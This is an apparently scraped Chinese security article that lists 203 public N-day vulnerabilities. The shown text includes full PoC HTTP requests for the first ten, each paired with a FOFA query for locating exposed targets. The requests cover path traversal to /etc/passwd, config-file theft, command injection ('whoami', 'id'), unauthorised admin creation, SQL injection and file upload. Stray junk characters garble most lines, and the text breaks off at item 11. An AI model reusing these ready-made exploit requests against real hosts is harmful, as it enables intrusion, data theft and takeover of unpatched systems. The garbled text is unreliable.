互联网公开漏洞整理202309-202406
; P6 Y) R* a$ {道一安全 2024-06-05 07:41 北京
% b {$ c/ t: ?, x以下文章来源于网络安全新视界 ,作者网络安全新视界+ y: u* b5 s0 a. R% b5 S8 p
9 u& W, T" h" m u1 v) N
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
u1 ~2 m# K2 A% R* v j. V3 M0 u6 }8 y6 A
& v* l } C2 Z3 F漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
* |/ `' W3 [5 L% U% q9 ]
+ [; A3 z5 q) H' k4 |6 S* Q& b安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。! U, m4 o) C" T( V {; a& T
: V5 S4 K+ f' V5 I: O( [3 w/ s6 z文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
0 ~" F s% J# {2 r! e9 y+ G) ] d0 T5 r
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
7 l5 u( U$ Z0 S: G$ J
6 n, B' ~3 }; C( {5 g
6 I* W" X4 G( t: @! x& a: }0 ~* A. B声明
3 H, w% E* _ | G! p2 R
9 e2 y0 o u1 S& B' I( b为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。/ M6 O6 l0 o2 Z
7 Y6 F9 l; W& M- |$ w% W
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
, r; `- E5 H* J2 ^5 |) r3 r8 z$ \* _0 F1 n$ W6 C0 P
$ ], [6 O: j# n6 }) M
/ }( y. x, r' x) [. f; z% K0 g目录
3 n8 K8 t' L+ [; J. X6 e7 Y$ E; M% M" q" Z
01" x: G, {$ p: D( @# R2 ` B9 U
1 }9 d; B; D1 u- ~
1. StarRocks MPP数据库未授权访问6 m' I K& Y5 Q6 j) w
2. Casdoor系统static任意文件读取
! p6 m5 a! s5 k+ m3. EasyCVR智能边缘网关 userlist 信息泄漏3 g- M5 r J# L3 o
4. EasyCVR视频管理平台存在任意用户添加
$ `: u: R3 |4 ^& j3 J5. NUUO NVR 视频存储管理设备远程命令执行
0 |5 i) | I! }' F5 r6. 深信服 NGAF 任意文件读取
" Q2 g9 e6 s" }) {1 W6 q- T5 R7. 鸿运主动安全监控云平台任意文件下载8 J/ L1 g. D) j# F' ^7 Z
8. 斐讯 Phicomm 路由器RCE
+ m; p1 m4 K6 E' m/ t2 b9. 稻壳CMS keyword 未授权SQL注入& V0 l% D! J; ?7 L
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
2 ?% j6 Q: |& v11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入, a [ _ u4 m( m
12. Jorani < 1.0.2 远程命令执行( r: e0 j+ j$ N1 e5 o. A3 t; R
13. 红帆iOffice ioFileDown任意文件读取
% j3 x3 ]5 b7 `3 k. G ~( w9 U- H' O14. 华夏ERP(jshERP)敏感信息泄露
# z# V0 M2 ]1 V4 a15. 华夏ERP getAllList信息泄露2 O1 M' B/ u/ Z+ a$ X( t
16. 红帆HFOffice医微云SQL注入7 E. s& G, Z3 n6 w" G# P
17. 大华 DSS itcBulletin SQL 注入
2 D% ?( L) G; Y* d. I" ]- d18. 大华 DSS 数字监控系统 user_edit.action 信息泄露' Z- Y5 O [' `# B- }4 u
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
$ M! A6 f/ g5 H, Y U1 H _( f' j% h20. 大华ICC智能物联综合管理平台任意文件读取0 j7 v2 u) \7 `* E- T: |
21. 大华ICC智能物联综合管理平台random远程代码执行
! _7 f& S$ s2 b# F7 b) n% s22. 大华ICC智能物联综合管理平台 log4j远程代码执行
3 Q! c( n$ J$ v23. 大华ICC智能物联综合管理平台 fastjson远程代码执行" r; r; t0 O' R( r" n
24. 用友NC 6.5 accept.jsp任意文件上传
: k1 A% j% c3 k' \' u# U1 Z25. 用友NC registerServlet JNDI 远程代码执行. g6 K7 x* B" V3 A/ G
26. 用友NC linkVoucher SQL注入
1 \6 J" f: O% y6 V. A27. 用友 NC showcontent SQL注入
+ K* m0 E8 Y6 O; h28. 用友NC grouptemplet 任意文件上传
7 U) u8 |% A* {1 I; R29. 用友NC down/bill SQL注入, `, f; g; [' E7 ^! u- e
30. 用友NC importPml SQL注入
6 H8 @; M3 F% g# U/ T: M31. 用友NC runStateServlet SQL注入
+ e: Q9 d8 T2 W3 K' h1 E: q32. 用友NC complainbilldetail SQL注入( i, R) V+ g5 ~# ?4 Q! w0 `
33. 用友NC downTax/download SQL注入+ f: a6 h3 ?3 M# A
34. 用友NC warningDetailInfo接口SQL注入
9 ~: e# x! {* P* N; D$ X35. 用友NC-Cloud importhttpscer任意文件上传
; Q% y" A p7 g! p9 X36. 用友NC-Cloud soapFormat XXE
4 a* s) d) ~8 M# N7 n7 y37. 用友NC-Cloud IUpdateService XXE5 g v' M$ T" H4 s1 B9 x0 U' W
38. 用友U8 Cloud smartweb2.RPC.d XXE2 S4 {/ ?7 c0 R) r
39. 用友U8 Cloud RegisterServlet SQL注入
8 K9 y/ N0 \- e' U) E+ \! ^40. 用友U8-Cloud XChangeServlet XXE
4 x7 e( M* L5 _+ P1 B4 _41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
3 `- {0 m+ ]- m+ R5 [1 j& x; f42. 用友GRP-U8 SmartUpload01 文件上传! ~! E& N8 p8 z6 x8 [( G
43. 用友GRP-U8 userInfoWeb SQL注入致RCE+ h0 D) N" Q& n' k) ]! C, |
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
" T1 f* n$ t4 l45. 用友GRP-U8 ufgovbank XXE6 z: n+ q) v6 E2 [/ d( w* M
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
5 V* s N. Q& L5 z! D* C47. 用友GRP A++Cloud 政府财务云 任意文件读取
, W# v% u; I' w, a I, n48. 用友U8 CRM swfupload 任意文件上传7 b0 c) h" h4 P! r" K' A
49. 用友U8 CRM系统uploadfile.php接口任意文件上传0 U) i9 q6 I1 O) N" Y
50. QDocs Smart School 6.4.1 filterRecords SQL注入
5 r# l' z9 F. I' c. f51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
+ L; J. }6 y% t* T) \52. 泛微E-Office json_common.php sql注入
. q3 E; b% Q* M53. 迪普 DPTech VPN Service 任意文件上传7 Y7 g' p: Y* B
54. 畅捷通T+ getstorewarehousebystore 远程代码执行8 H( t& p6 Y7 `3 \. Q
55. 畅捷通T+ getdecallusers信息泄露
: b$ Y0 R: D$ @2 m. z9 g* d56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE% I5 g s @- m* B/ Q; B
57. 畅捷通T+ keyEdit.aspx SQL注入
( c+ M4 d% E9 A4 T, l58. 畅捷通T+ KeyInfoList.aspx sql注入
. s! q' P# P5 z, d$ |/ L59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行5 F1 h8 |- C: H! z5 c
60. 百卓Smart管理平台 importexport.php SQL注入
" X$ z- y: U, |7 M9 U; x7 H, U61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
& T7 o C* F5 K* z- y0 n62. IP-guard WebServer 远程命令执行7 }' f% S6 A- d. Z. R; d9 B+ a
63. IP-guard WebServer任意文件读取
/ M, e3 T8 Y0 l1 S64. 捷诚管理信息系统CWSFinanceCommon SQL注入' u; `, b; Y; H5 f. ~
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
$ ~3 g8 p1 f, R9 W Q& A0 U5 J66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
$ X: l5 X% k0 d2 N6 x67. 万户ezOFFICE wpsservlet任意文件上传& I( J" J" }, X. n! J! o
68. 万户ezOFFICE wf_printnum.jsp SQL注入. M3 O7 V2 T( ]9 b: e$ i( Q0 n
69. 万户 ezOFFICE contract_gd.jsp SQL注入
8 m! j/ h0 n; S+ B70. 万户ezEIP success 命令执行! N. j% _7 T5 n( Z; i
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
! n9 b- K7 I$ M/ l72. 致远OA getAjaxDataServlet XXE
" b: }7 x1 g; E: A- ?# v1 r. |: V/ i73. GeoServer wms远程代码执行$ Z: l2 H' y5 K# G" l
74. 致远M3-server 6_1sp1 反序列化RCE' b% S$ B5 g ^* a- ]
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE+ g( }4 I" K& L4 ^. k* K
76. 新开普掌上校园服务管理平台service.action远程命令执行$ [) T( e8 S9 U5 Z* \/ S7 `
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
6 I V' Y2 E2 I$ |& \' D78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传" z4 k( F( C) A0 r* O' `
79. BYTEVALUE 百为流控路由器远程命令执行
! b5 q, W7 L9 w6 R' v80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
# }" A% X, `+ e; e* j5 p: c2 w81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露8 U6 r3 S3 g7 r$ Y7 E0 a
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
^( E/ u2 z2 G83. JeecgBoot testConnection 远程命令执行
3 U3 r% f" F( f# v' v1 l84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
7 U# ~( T. c& b! C. }85. SysAid On-premise< 23.3.36远程代码执行9 D$ I5 _8 H$ k+ G) t5 H& j; q7 N" l
86. 日本tosei自助洗衣机RCE
3 Z$ w% S" f+ I1 M87. 安恒明御安全网关aaa_local_web_preview文件上传, ?# E4 K- ?( n* N/ c( }: d; E7 J
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
* ?' I" g5 ?' C* Z8 ?/ `/ [89. 致远互联FE协作办公平台editflow_manager存在sql注入. A" n2 O+ K* U1 Q7 V
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
) o& K+ h" ^5 w+ y( E91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
& P- _8 @% f# o: F92. 海康威视运行管理中心session命令执行 }: z, W/ D7 C
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传4 r' b' p, o, H0 G6 f
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传$ x% q9 M5 X! }; j
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
2 s; t$ L# B! u6 g+ e96. Apache OFBiz 18.12.11 groovy 远程代码执行
0 m7 X! X, r, @) P8 f6 |97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
5 D& w8 f% [) C6 [8 o4 P0 g98. SpiderFlow爬虫平台远程命令执行
) B( A) N% F# @5 z- i! R4 r0 S99. Ncast盈可视高清智能录播系统busiFacade RCE
; Q8 j& W' v& v$ c l100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传7 _: _. O' d9 N: c$ c" Y6 @# [' D
101. ivanti policy secure-22.6命令注入
9 B) \% o; A5 ^# @. W3 ^: f& t102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
6 ?# p& P; _- C' z# J" ]103. Ivanti Pulse Connect Secure VPN XXE( o0 A) t# L, E3 N
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露 e& p4 S* l+ Z. r5 B \
105. SpringBlade v3.2.0 export-user SQL 注入/ Z% }) x( G R; q9 D- \/ ^
106. SpringBlade dict-biz/list SQL 注入
; b) a. U B" N0 p107. SpringBlade tenant/list SQL 注入
) Z4 K2 D( G$ a" x, C108. D-Tale 3.9.0 SSRF
1 s, T# g/ Z) I6 w8 A r/ o4 P) y109. Jenkins CLI 任意文件读取
) e/ M4 T3 H! S3 n( ^4 X110. Goanywhere MFT 未授权创建管理员8 p% m1 L, g5 h$ ?1 ~ O/ s
111. WordPress Plugin HTML5 Video Player SQL注入
2 S# C! d3 G m0 T7 n9 E112. WordPress Plugin NotificationX SQL 注入
3 Q& z+ S: V3 D( O113. WordPress Automatic 插件任意文件下载和SSRF# G9 V" G9 ]5 e" b3 s; ~
114. WordPress MasterStudy LMS插件 SQL注入, u' E, F/ k: c
115. WordPress Bricks Builder <= 1.9.6 RCE
6 ^7 X" W* P. p116. wordpress js-support-ticket文件上传
2 N: y$ b6 S' m) o' @+ n9 a117. WordPress LayerSlider插件SQL注入) t9 c k% U# D& B3 D" K3 {
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传 T9 X3 V& C9 b1 F5 X; J+ m
119. 北京百绰智能S20后台sysmanageajax.php sql注入
1 t! L0 N2 w+ x& k. x1 u6 `) G120. 北京百绰智能S40管理平台导入web.php任意文件上传5 V3 w5 _; |) `- x, k1 u
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
: n' i$ G/ \4 r2 `- z122. 北京百绰智能s200管理平台/importexport.php sql注入
! l+ i" _8 [9 R: J. Z123. Atlassian Confluence 模板注入代码执行) I, _' y* |6 U
124. 湖南建研工程质量检测系统任意文件上传
4 J9 q' d0 f2 [- E2 H& `: p125. ConnectWise ScreenConnect身份验证绕过
0 m6 D! p; q; V, Y$ O$ D126. Aiohttp 路径遍历' r& c0 U( m1 Q$ ?9 N+ p* _4 {
127. 广联达Linkworks DataExchange.ashx XXE! [8 Q4 a S, U1 R( F) Y
128. Adobe ColdFusion 反序列化
7 z4 f8 b( w2 \( h7 R2 j129. Adobe ColdFusion 任意文件读取
! K5 b4 c7 k$ t9 v130. Laykefu客服系统任意文件上传; j7 ]5 R; {, I, G+ `
131. Mini-Tmall <=20231017 SQL注入
# [+ g$ M7 @, I3 F8 u/ N132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过, H# F/ B z9 _/ {2 ~+ J) J9 n
133. H5 云商城 file.php 文件上传
: C3 h' E S4 a: F q+ s3 N& p134. 网康NS-ASG应用安全网关index.php sql注入% m2 w1 B- t6 q8 ~ V7 B4 A
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入% ?' B$ V. S! {9 d. Z- S# `
136. NextChat cors SSRF9 V9 Q+ C& n$ t4 Z9 n) r
137. 福建科立迅通信指挥调度平台down_file.php sql注入( N% Z6 K$ \2 _8 K
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
- r4 J" B+ k! U- w6 e+ v139. 福建科立讯通信指挥调度平台editemedia.php sql注入5 p$ F3 Q( c, l, L
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
. ^+ j9 \* w) m" d: e: M& L141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入; ~- _+ w. e3 F
142. CMSV6车辆监控平台系统中存在弱密码8 w+ c2 H& s! S& a8 R0 o
143. Netis WF2780 v2.1.40144 远程命令执行, l5 K' V) v4 v2 g& i$ M& Z+ u/ ]
144. D-Link nas_sharing.cgi 命令注入- p# w3 G, z* u5 }) c
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入: C9 A& T$ j. @' m+ W- i( O6 v; _
146. MajorDoMo thumb.php 未授权远程代码执行5 o; n! C0 m: C1 O8 t' R0 N, b( ?7 t
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历) ~/ b' P8 o6 w
148. CrushFTP 认证绕过模板注入
# J6 S; J+ e/ y& p) o+ n149. AJ-Report开源数据大屏存在远程命令执行3 {5 Y; s* Q, Q+ T
150. AJ-Report 1.4.0 认证绕过与远程代码执行
5 G9 L' R, Q% t& b151. AJ-Report 1.4.1 pageList sql注入, Y+ U7 A" G) r1 `" X$ B4 r& u
152. Progress Kemp LoadMaster 远程命令执行; ^6 }: A p" M. M
153. gradio任意文件读取- Z5 h8 l. J9 K( ]
154. 天维尔消防救援作战调度平台 SQL注入
2 o f! J5 ]; ^2 s: ]# \9 b155. 六零导航页 file.php 任意文件上传
; f+ j% k8 t0 y; e( X9 W. C156. TBK DVR-4104/DVR-4216 操作系统命令注入
6 @: N+ P& M& d% m% \: l' ]& Q157. 美特CRM upload.jsp 任意文件上传, U+ ~; ]$ x$ D4 O
158. Mura-CMS-processAsyncObject存在SQL注入- [. s' s4 W" e% E5 c, Q
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
) ~3 @, a( v5 C; I! Q/ v160. Sonatype Nexus Repository 3目录遍历与文件读取
1 C! ]# V0 ^0 G6 p# g7 I161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
- h! s, y. h9 }/ d$ Q, o162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
& C6 n p: t3 L2 ?4 t3 }163. 号卡极团分销管理系统 ue_serve.php 任意文件上传! _) s: q6 L. @! Y- }
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
# v4 \# Q4 W# {, o8 ^6 Y; C165. OrangeHRM 3.3.3 SQL 注入6 L7 T6 `' E. s# \" J6 ~4 F
166. 中成科信票务管理平台SeatMapHandler SQL注入
8 N- r! k7 w: x& p: w( K- P; P3 Y167. 精益价值管理系统 DownLoad.aspx任意文件读取9 P7 `+ Z9 L+ F) a
168. 宏景EHR OutputCode 任意文件读取
, K; M8 A$ x- Q: h! W& Y169. 宏景EHR downlawbase SQL注入
) x6 |9 y1 _, N5 D170. 宏景EHR DisplayExcelCustomReport 任意文件读取
) b" d2 |/ V( b: L& B; {5 o171. 通天星CMSV6车载定位监控平台 SQL注入; {7 `1 ~2 ]* ~
172. DT-高清车牌识别摄像机任意文件读取& x g" F' B. g* J k& g' _1 Z
173. Check Point 安全网关任意文件读取+ P8 S3 L: B- b2 N" b8 k; V9 h$ p2 }; p
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
% |" b2 b$ S% a! a a0 [5 C- Q- c175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
0 B7 ]7 d2 f" {# e3 L; M9 @/ F+ Q- C. x176. 电信网关配置管理系统 rewrite.php 文件上传# _! x9 P1 y; \. o
177. H3C路由器敏感信息泄露2 j$ b3 d) Q+ L* A# x
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
- D1 T/ r& T7 n" r) Z$ ?179. 建文工程管理系统存在任意文件读取% d; C; o$ p- k' U7 |" V! ]
180. 帮管客 CRM jiliyu SQL注入
- S4 B1 d1 ?1 ^3 c+ _9 X! e181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入0 v) {# U5 D8 A4 T# B
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
; ?' {5 k/ w8 b# V183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
2 j4 `) Z1 N( T. B3 D$ Y0 p184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
0 |) r: h0 m6 |/ f5 T- R: {185. 瑞友天翼应用虚拟化系统SQL注入
2 N; @5 @) g1 a& ]- T' m( [* \8 C" ?186. F-logic DataCube3 SQL注入
# @# b! C- J$ d187. Mura CMS processAsyncObject SQL注入
3 h7 j6 J' I4 I0 O, I" t p- t1 Q188. 叁体-佳会视频会议 attachment 任意文件读取 s' [2 v! @9 c% `" f3 l6 E& A9 C
189. 蓝网科技临床浏览系统 deleteStudy SQL注入" b% i) B6 R/ m( W
190. 短视频矩阵营销系统 poihuoqu 任意文件读取- E; Q' ]0 _7 R( S1 w2 q( D
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
/ r8 l5 w3 u D: X- ~1 _2 B192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
) r. I7 W: H5 [5 X+ ]5 A193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行3 j% [7 r$ W( q- J
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
& ~* X3 M0 t1 E- Z& _& z9 h195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
. |# J& D4 E: I; M a" B196. 河南省风速科技统一认证平台密码重置
% R: g2 n& T# h- @197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
- e& n/ Y9 I1 r8 c198. 阿里云盘 WebDAV 命令注入. u, v6 d9 \1 `2 w" x. w. K
199. cockpit系统assetsmanager_upload接口 文件上传
" N% X/ r, V- {0 K2 o$ Z: y200. SeaCMS海洋影视管理系统dmku SQL注入
4 V; q/ E1 {* B2 H5 s201. 方正全媒体新闻采编系统 binary SQL注入
6 ?. F. H9 x1 ?5 ^7 g/ J202. 微擎系统 AccountEdit任意文件上传
7 z' R) t* o( J: R9 f r203. 红海云EHR PtFjk 文件上传 e* d6 U$ @8 {. j
5 w# Q' u6 C9 `& \2 s# n1 }
POC列表
4 o# O' x% V4 p# G) V) \; g; x
0 b8 |3 P0 I, x' d8 ]% x$ r02
9 x7 u$ i, Y9 i- I* I. P3 a6 z$ I) _$ D8 K
1. StarRocks MPP数据库未授权访问
* {& ^8 s3 w% u* ?- r; v4 T5 t6 PFOFA :title="StarRocks"
F1 S6 q/ W/ |, ^5 c/ d7 SGET /mem_tracker HTTP/1.1
) V6 u8 Q6 l" c# b! y0 M! I- ]Host: URL' H* Z! O" Z2 O0 y+ T
# S* I: T: v& u+ A0 L- M6 N6 x y
8 q/ T+ @" g; e9 Z$ l+ Z) O
2. Casdoor系统static任意文件读取
* h; ^+ k3 L1 o. d3 sFOFA :title="Casdoor"
- L0 R6 r% J8 s& ^) HGET /static/../../../../../../../../../../../etc/passwd HTTP/1.11 l* t: b. Z1 T' c' l9 q
Host: xx.xx.xx.xx:9999+ S, R3 C- _$ H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* r6 u8 ]0 D0 V$ a0 h4 h
Connection: close
! r6 x- C* J& b; l6 E$ HAccept: */*
8 |# @- ]0 X- z4 g! FAccept-Language: en
7 I" u0 I: H) z" b9 U5 ^$ RAccept-Encoding: gzip) j) G d1 b/ [/ [) h5 O
0 I! j4 [' {9 p Z/ l' I' u2 D+ ?: \- c S. V! ^
3. EasyCVR智能边缘网关 userlist 信息泄漏
* s" G4 q* P8 h# W$ ~FOFA :title="EasyCVR"9 i0 n1 L |* \3 K- V. _- h
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1' r8 v- ^2 x/ R, k3 b) a/ Y. }
Host: xx.xx.xx.xx3 s0 W, V/ ^3 |6 I. O+ w c
3 ~7 s* X4 A c* l- Z. x: F
$ p; V* H9 r2 v3 K. m* g4. EasyCVR视频管理平台存在任意用户添加9 {! U$ |. N" x/ t
FOFA :title="EasyCVR"
& H P) k+ W* k; |' A6 _# B2 o
; e8 [8 x7 _$ T. @password更改为自己的密码md5( [! M% v: _2 t( r' @
POST /api/v1/adduser HTTP/1.1( ?2 Q( a9 M9 U& H1 ~
Host: your-ip& b% H( y, V/ _: }
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
$ E h' g4 w/ C; g' n0 J: O J5 ]" g' N; s5 R# ^
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=19 n# Z( E7 P& W* `3 z9 k' J7 j z
# Y' Y5 N \% t- B
! h" o5 P3 G6 U" S
5. NUUO NVR 视频存储管理设备远程命令执行6 e. {/ Y# Y" D" Z+ s
FOFA:title="Network Video Recorder Login" P8 x2 Y, Q* r
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
3 @! b/ g0 ]" K/ JHost: xx.xx.xx.xx4 X9 m# a5 I* M7 U: [, c
( v3 S% Z4 f+ r
" r1 @# C' z# [& j
6. 深信服 NGAF 任意文件读取
, X8 H; f" [/ jFOFA:title="SANGFOR | NGAF"6 l( G3 W: D4 U
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
2 I! |1 h. m6 FHost:
" \1 ]2 B. H/ b/ O) t F0 s
5 _5 }' O* z% l" e& F" v2 n% Z
8 J1 F- X7 F+ l! V3 n& n6 @5 m7. 鸿运主动安全监控云平台任意文件下载
& Z/ h6 W5 n) w4 C1 f' ]FOFA:body="./open/webApi.html"
. o8 w6 ]' P7 K. n; v0 v; IGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1- P, g8 ~* ]( X
Host:
3 k0 @6 N6 l: k5 D j' @; V0 `8 X& J2 ^# ]7 T( `
$ |5 q) ^$ k1 O) N' N8. 斐讯 Phicomm 路由器RCE
% L* m1 O$ m7 `# q' F% J+ R+ HFOFA:icon_hash="-1344736688"
, }5 ~+ ~9 {6 ~. W O默认账号admin登录后台后,执行操作
9 w* z) N1 u9 K2 ]- bPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1. T( K, h/ V) Z' s
Host: x.x.x.x
" p: i% g+ v! p8 n1 ]& \4 PCookie: sysauth=第一步登录获取的cookie9 e3 w/ |8 O2 b
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz# n8 Z* u% {( q3 J4 i
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
: x( W2 S0 f. j0 N3 I: _
4 Z* w& M! r; ?5 _% A------WebKitFormBoundaryxbgjoytz
0 d# {: p" J$ A+ U6 U" S' d" v0 hContent-Disposition: form-data; name="wifiRebootEnablestatus" t) B4 H! }9 _" c- V0 u" E* I0 G
6 ?1 o6 B( y! `8 c0 k& _" d2 S
%s! p" S N7 _# i$ n: |
------WebKitFormBoundaryxbgjoytz
7 r; h8 @3 E0 u: qContent-Disposition: form-data; name="wifiRebootrange"
& }2 S7 x" [* y$ @3 [ M0 J4 x- R- ]
12:00; id;
* T: ]$ T ^4 e% G& U3 f4 p------WebKitFormBoundaryxbgjoytz4 R7 K" ]( M1 v3 H5 `+ I) u0 D
Content-Disposition: form-data; name="wifiRebootendrange"1 N4 b1 S9 D. _2 k
$ C" P# Y" g( V! J: h0 B%s:
; k: L8 y$ Y t _5 |0 h------WebKitFormBoundaryxbgjoytz
( X4 C V$ b: `Content-Disposition: form-data; name="cururl2"
2 A4 ^, X% M; C; `" }& J: n3 C ]; D0 f' o5 ~$ @
! v$ m' ~* n8 u7 H: p1 \
------WebKitFormBoundaryxbgjoytz--* y1 V) ?) T Y# {7 f) J8 J/ D
; t% U! H8 B& I& V! G' g3 w! s( h5 C6 L* ? c+ M( i9 j3 l
9. 稻壳CMS keyword 未授权SQL注入
$ k* x( z! C2 o( R8 FFOFA:app="Doccms"# E- Z+ K2 \& _1 k @# G
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1% s7 i/ n, V4 f( s$ ~# a+ r, ]
Host: x.x.x.x7 G: l F* `+ I3 _1 [) {" J
: j1 K3 v% u% X( e+ D* w w
2 I1 Q; V) o, X, j# I! l! h; }- o
payload为下列语句的二次Url编码; O' a+ K2 k$ X0 Q9 m* Q
/ X1 ^! S* J+ w3 G
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
% P( H$ O' M0 ^& x$ \ C! O% r; n" R W) W n
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传1 z8 o) L* T K( p. f. i
FOFA:icon_hash="953405444"5 O t4 F/ \# w/ `6 l
% I8 x7 z* W$ T6 y) a) Z" B2 k6 o文件上传后响应中包含上传文件的路径6 J5 ^% w1 U8 f$ y; v
POST /eis/service/api.aspx?action=saveImg HTTP/1.1; }+ b& X( P4 ]2 c4 ]
Host: x.x.x.x:xx
/ U, Y# f- D6 C9 b4 U& X: bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
! h7 W: \; q, r' jContent-Length: 197( r, U+ ~* O% z- |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9; f+ l" t; k* X! _! z
Accept-Encoding: gzip, deflate% e$ s: p) M+ G+ S
Accept-Language: zh-CN,zh;q=0.9
& r6 V3 y& e: q5 XConnection: close& h1 U* y8 q$ s- `: \
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
* N, _# k8 V0 a# w
4 i& P) j7 \0 q------WebKitFormBoundaryxdgaqmqu5 L- f/ K5 q# ]& D! m# H
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
( r' a- l3 N& [ e: j5 B3 jContent-Type: text/html
; [5 m/ p9 T. h% X
! n+ B3 S( r+ g K4 U! Qjmnqjfdsupxgfidopeixbgsxbf! s& n* `8 \8 m
------WebKitFormBoundaryxdgaqmqu--
/ j6 b3 g1 k# p4 d7 }
& |( t8 F) y# ]: z4 t4 R
3 @3 g* H u- \2 _5 m b- ?11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入3 P; H4 \0 u, T R+ E+ z2 P0 X
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"/ N9 g2 ]/ b0 Y
